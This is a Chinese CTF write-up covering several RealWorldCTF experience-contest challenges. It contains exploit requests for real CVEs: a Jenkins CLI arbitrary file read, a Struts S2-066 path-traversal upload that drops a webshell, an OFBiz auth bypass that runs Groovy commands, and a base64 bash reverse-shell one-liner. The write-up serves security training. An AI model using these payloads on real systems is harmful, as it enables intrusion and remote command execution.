第六届RealWorldCTF体验赛部分题解

admin
admin
admin
103387
文章
87
评论
2024年2月2日19:40:16评论38 views字数 2387阅读7分57秒阅读模式
第六届RealWorldCTF体验赛部分题解
第六届RealWorldCTF体验赛部分题解

总结一句话:
太菜了

Be-an-ActiveMq-Hacker:

第六届RealWorldCTF体验赛部分题解

这里根据题目描述是CVE-2023-46604的漏洞

github找个EXP即可

第六届RealWorldCTF体验赛部分题解

第六届RealWorldCTF体验赛部分题解

poc.xml放在VPS并开启http服务

第六届RealWorldCTF体验赛部分题解

第六届RealWorldCTF体验赛部分题解

第六届RealWorldCTF体验赛部分题解

./readflag即可

Be-a-Security-Researcher:

CVE-2024-23897的Jenkins文件读取漏洞

第六届RealWorldCTF体验赛部分题解

根据这篇文章的复现情况

第六届RealWorldCTF体验赛部分题解

权限绕过:拥有Overall/Read权限可以读取完整的文件。没有该权限可以读取文件的前几行

删除身份验证测试
java -jar jenkins-cli.jar -s http://127.0.0.1:8080/ -webSocket who-am-i @/flag

第六届RealWorldCTF体验赛部分题解

即可

Be-More-Elegant:

第六届RealWorldCTF体验赛部分题解

这题是根据CVE-2023-50164/S2-066的漏洞复现

第六届RealWorldCTF体验赛部分题解

其中JspFilter.class发现存在以下判断

第六届RealWorldCTF体验赛部分题解

要传到views目录下的jsp马才能满足

POC:

POST /upload.action HTTP/1.1Host: 47.99.57.31:8080Content-Length: 815Cache-Control: max-age=0Upgrade-Insecure-Requests: 1Origin: http://47.99.57.31:8080Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryHLYV7AkIaj17S7aaUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Referer: http://47.99.57.31:8080/Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,ja;q=0.8,vi;q=0.7Cookie: JSESSIONID=69B7679A31F420D2F748C066CDF70D04Connection: close------WebKitFormBoundary3ZyI4HfPn9dOq0ETContent-Disposition: form-data; name="FileUpload"; filename="hack.txt"Content-Type: text/plain哥斯拉马的内容------WebKitFormBoundary3ZyI4HfPn9dOq0ETContent-Disposition: form-data; name="fileUploadFileName"; ../../../../views/hack.jsp------WebKitFormBoundary3ZyI4HfPn9dOq0ET--

Be-a-Framework-Hacker:

这题需要隐藏真实Host绕过,不然发送payload会提示Host不在ip白名单内(这里用到的是Yakit中的Web Fuzzer发包)

第六届RealWorldCTF体验赛部分题解

第六届RealWorldCTF体验赛部分题解

CVE-2023-51467的编号

POC:

POST /webtools/control/ProgramExport?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1Host: 127.0.0.1:28080Accept:*/*Content-Type: application/x-www-form-urlencoded; charset=UTF-8User-Agent: Mozilla/5. (windows NT 100; Win64; x64)AppleWebKit/537.36 (KHTML,like Gecko) Chrome/Safari/537.36Accept-Encoding: gzip,deflate,brAccept-Language:en-US,en;g=0.9Connection: closegroovyProgram=import+groovy.lang.GroovyShell%0D%0A%0D%0AGroovyShell+shell+%3D+new+GroovyShell%28%29%3B%0D%0Ashell.evaluate%28%27%22执行的命令%22.execute%28%29%27%29

最后

bash -c {echo,Base64编码后的Payload} | {base64,-d} | {bash,-i}

反弹shell ./readflag即可

vision:

下载附件进行IDA分析

第六届RealWorldCTF体验赛部分题解

来到mian函数下进入到sub_1589下分析

第六届RealWorldCTF体验赛部分题解

我们只能使用strcpy提供的命令,并且这里的showKey的命令由以下if判断,每次showKey都是随机不可能满足cat ./flag的条件

第六届RealWorldCTF体验赛部分题解

因此,将目光放在可以使用的命令上

固件提供了data命令

可以利用data命令来读取flag

链接:

https://gtfobins.github.io/gtfobins/date/

第六届RealWorldCTF体验赛部分题解

也就是data -f ./flag即可获取flag

第六届RealWorldCTF体验赛部分题解
第六届RealWorldCTF体验赛部分题解

# 往期推荐 #

第六届RealWorldCTF体验赛部分题解

CNVD通用型漏洞挖掘-cnvd证书的刷洞技巧

红队-二层网络下的域渗透攻防

红队-三层网络下的域渗透攻防

交流1群已满加微信号PWNCat
第六届RealWorldCTF体验赛部分题解

~

原文始发于微信公众号(PwnPigPig):第六届RealWorldCTF体验赛部分题解

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月2日19:40:16
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   第六届RealWorldCTF体验赛部分题解http://cn-sec.com/archives/2461455.html

发表评论

匿名网友 填写信息